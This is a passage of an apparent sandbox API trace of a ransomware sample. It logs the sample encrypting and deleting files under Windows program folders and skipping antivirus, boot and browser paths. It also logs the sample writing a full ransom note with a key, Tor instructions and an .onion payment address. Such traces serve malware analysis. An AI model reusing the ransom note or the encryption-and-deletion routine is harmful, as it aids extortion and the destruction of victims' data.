ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.143] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.143] GetLastError () returned 0x0 [0160.143] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.143] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.143] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.143] GetLastError () returned 0x0 [0160.143] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.143] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.144] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.144] GetLastError () returned 0x0 [0160.144] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.144] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.144] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.144] GetLastError () returned 0x0 [0160.144] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.144] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.144] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.144] GetLastError () returned 0x0 [0160.144] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.144] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.144] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.144] GetLastError () returned 0x0 [0160.144] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.144] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.144] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.144] GetLastError () returned 0x0 [0160.144] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.144] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.144] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.144] GetLastError () returned 0x0 [0160.144] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.144] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.144] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x110) returned 1 [0160.145] GetLastError () returned 0x0 [0160.145] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x110, lpOverlapped=0x0) returned 1 [0160.145] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x0, lpOverlapped=0x0) returned 1 [0160.145] WriteFile (in: hFile=0x588, lpBuffer=0x29012e8*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesWritten=0x2d7e15c*=0x0, lpOverlapped=0x0) returned 1 [0160.145] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-PT\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\pt-pt\\tipresx.dll.mui")) returned 0x20 [0160.145] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-PT\\tipresx.dll.mui", dwFileAttributes=0x20) returned 0 [0160.145] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-PT\\tipresx.dll.mui") returned 1 [0160.145] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-PT\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\pt-pt\\tipresx.dll.mui")) returned 0 [0160.145] wcscpy (in: _Dest=0x2d7dcb4, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-PT\\tipresx.dll.mui" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-PT\\tipresx.dll.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-PT\\tipresx.dll.mui" [0160.145] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-PT\\tipresx.dll.mui" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-PT") returned 1 [0160.145] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-PT", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7debc | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-PT\\.xXE4D6.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\pt-pt\\.xxe4d6.tmp")) returned 0xe4d6 [0160.146] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-PT\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\pt-pt\\tipresx.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-PT\\.xXE4D6.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\pt-pt\\.xxe4d6.tmp"), dwFlags=0x1) returned 0 [0160.146] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-PT\\.xXE4D6.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\pt-pt\\.xxe4d6.tmp")) returned 1 [0160.146] CryptDestroyKey (hKey=0x9ad138) returned 1 [0160.146] wcslen (_String="OK") returned 0x2 [0160.146] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0160.146] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0160.146] CryptDestroyKey (hKey=0x9ad378) returned 1 [0160.146] CryptDestroyHash (hHash=0x9ad678) returned 1 [0160.146] CryptReleaseContext (hProv=0x8e3bb0, dwFlags=0x0) returned 1 [0160.147] FindNextFileW (in: hFindFile=0x9ad738, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 0 [0160.147] GetLastError () returned 0x12 [0160.147] FindClose (in: hFindFile=0x9ad738 | out: hFindFile=0x9ad738) returned 1 [0160.147] _wfopen (_FileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-PT\\Recovers your files.html" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\pt-pt\\recovers your files.html"), _Mode="w") returned 0x77ac1268 [0160.147] fputs (in: _Str=" Encrypted files!

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a

Encrypted files!

All your files are encrypted.Using AES256-bit encryption and RSA-2048-bit encryption.
Making it impossible to recover files without the correct private key.
If you are interested in getting is the key and recover your files
You should proceed with the following steps.

The only way to decrypt your files safely is to buy the Descrypt and Private Key software.

Any attempts to restore your files with the third-party software will be fatal for your files!

Important use Firefox or Chrome browser

To proceed with the purchase you must access one of the link below

If neither of the links is online for a long period of time, there is another way to open it, you should install the Tor Browser

If your personal page is not available for a long period there is another way to open your personal page - installation and use of Tor Browser:

  1. run your Internet browser (if you do not know what it is run the Internet Explorer);
  2. enter or copy the address https://www.torproject.org/download/download-easy.html.en into the address bar of your browser and press ENTER;
  3. wait for the site loading;
  4. on the site you will be offered to download Tor Browser; download and run it, follow the installation instructions, wait until the installation is completed;
  5. run Tor Browser;
  6. connect with the button 'Connect' (if you use the English version);
  7. a normal Internet browser window will be opened after the initialization;
  8. type or copy the address

    https://lylh3uqyzay3lhrd.onion

    in this browser address bar;
  9. press ENTER;
  10. the site should be loaded; if for some reason the site is not loading wait for a moment and try again.
If you have any problems during installation or use of Tor Browser, please, visit https://www.youtube.com and type request in the search bar 'Install Tor Browser Windows' and you will find a lot of training videos about Tor Browser installation and use.

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a
", _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0160.147] fclose (in: _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0160.148] wcslen (_String="Unfortunately crypted files: ") returned 0x1d [0160.148] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0160.148] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0160.148] wcslen (_String="Fortunately ignored files because of filters: ") returned 0x2e [0160.148] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0160.148] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0160.148] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ro-RO\\*", pszSpec="*.exe") returned 0 [0160.148] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ro-RO\\*", pszSpec="*.dll") returned 0 [0160.148] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ro-RO\\*", pszSpec="*.lnk") returned 0 [0160.148] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ro-RO\\*", pszSpec="*.bat") returned 0 [0160.148] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ro-RO\\*", pszSpec="*.ini") returned 0 [0160.148] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ro-RO\\*", pszSpec="*.msi") returned 0 [0160.148] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ro-RO\\*", pszSpec="*.scf") returned 0 [0160.148] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ro-RO\\*", pszSpec="*pagefile.sys*") returned 0 [0160.148] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ro-RO\\*", pszSpec="*NTUSER.DAT*") returned 0 [0160.148] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ro-RO\\*", pszSpec="*AppData*") returned 0 [0160.148] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ro-RO\\*", pszSpec="*\\winrar\\*") returned 0 [0160.148] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ro-RO\\*", pszSpec="*\\Internet Explorer\\*") returned 0 [0160.148] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ro-RO\\*", pszSpec="*\\java\\*") returned 0 [0160.148] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ro-RO\\*", pszSpec="*\\TeamViewer\\*") returned 0 [0160.148] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ro-RO\\*", pszSpec="*\\windows\\*") returned 0 [0160.148] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ro-RO\\*", pszSpec="*\\ESET\\*") returned 0 [0160.148] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ro-RO\\*", pszSpec="*\\AVG\\*") returned 0 [0160.148] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ro-RO\\*", pszSpec="*\\AVIRA\\*") returned 0 [0160.148] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ro-RO\\*", pszSpec="*\\AVAST Software\\*") returned 0 [0160.148] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ro-RO\\*", pszSpec="*Atheros*") returned 0 [0160.148] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ro-RO\\*", pszSpec="*Realtek*") returned 0 [0160.148] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ro-RO\\*", pszSpec="*bootmgr*") returned 0 [0160.148] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ro-RO\\*", pszSpec="*boot*") returned 0 [0160.148] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ro-RO\\*", pszSpec="*boot*") returned 0 [0160.148] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ro-RO\\*", pszSpec="*CONFIG.SYS*") returned 0 [0160.148] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ro-RO\\*", pszSpec="*IO.SYS*") returned 0 [0160.148] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ro-RO\\*", pszSpec="*MSDOS.SYS*") returned 0 [0160.148] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ro-RO\\*", pszSpec="*NTDETECT.COM*") returned 0 [0160.148] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ro-RO\\*", pszSpec="*ntldr*") returned 0 [0160.148] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ro-RO\\*", pszSpec="*chrome*") returned 0 [0160.148] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ro-RO\\*", pszSpec="*opera*") returned 0 [0160.149] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ro-RO\\*", pszSpec="*firefox*") returned 0 [0160.149] wcslen (_String="\\\\?\\") returned 0x4 [0160.149] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ro-RO\\*", lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 0x9ad2b8 [0160.149] wcscmp (_String1=".", _String2=".") returned 0 [0160.149] FindNextFileW (in: hFindFile=0x9ad2b8, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0160.149] wcscmp (_String1="..", _String2=".") returned 1 [0160.149] wcscmp (_String1="..", _String2="..") returned 0 [0160.149] FindNextFileW (in: hFindFile=0x9ad2b8, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0160.149] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*NMCRYPT") returned 0 [0160.149] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*Recovers your files.html") returned 0 [0160.149] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.exe") returned 0 [0160.149] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.dll") returned 0 [0160.149] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.lnk") returned 0 [0160.149] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.bat") returned 0 [0160.149] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.ini") returned 0 [0160.149] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.msi") returned 0 [0160.149] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.scf") returned 0 [0160.149] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*pagefile.sys*") returned 0 [0160.149] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*NTUSER.DAT*") returned 0 [0160.149] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*AppData*") returned 0 [0160.149] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\winrar\\*") returned 0 [0160.149] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\Internet Explorer\\*") returned 0 [0160.149] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\java\\*") returned 0 [0160.149] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\TeamViewer\\*") returned 0 [0160.149] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\windows\\*") returned 0 [0160.149] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\ESET\\*") returned 0 [0160.149] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\AVG\\*") returned 0 [0160.149] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\AVIRA\\*") returned 0 [0160.149] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\AVAST Software\\*") returned 0 [0160.149] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*Atheros*") returned 0 [0160.149] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*Realtek*") returned 0 [0160.149] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*bootmgr*") returned 0 [0160.149] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*boot*") returned 0 [0160.149] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*boot*") returned 0 [0160.149] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*CONFIG.SYS*") returned 0 [0160.149] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*IO.SYS*") returned 0 [0160.149] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*MSDOS.SYS*") returned 0 [0160.149] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*NTDETECT.COM*") returned 0 [0160.149] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*ntldr*") returned 0 [0160.149] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*chrome*") returned 0 [0160.149] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*opera*") returned 0 [0160.150] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*firefox*") returned 0 [0160.150] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ro-RO\\tipresx.dll.mui", pszSpec="*") returned 1 [0160.150] strlen (_Str="NMoreira") returned 0x8 [0160.150] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.150] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.150] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.150] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.150] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.150] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.150] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.150] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.150] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.150] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.150] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.150] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.150] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.150] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.150] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.150] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.150] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.150] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.150] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.150] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.150] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.150] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.150] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.150] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.150] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.150] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.150] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.150] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.150] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.150] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.150] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.150] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.150] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.150] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.150] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.150] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.151] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.151] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.151] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, 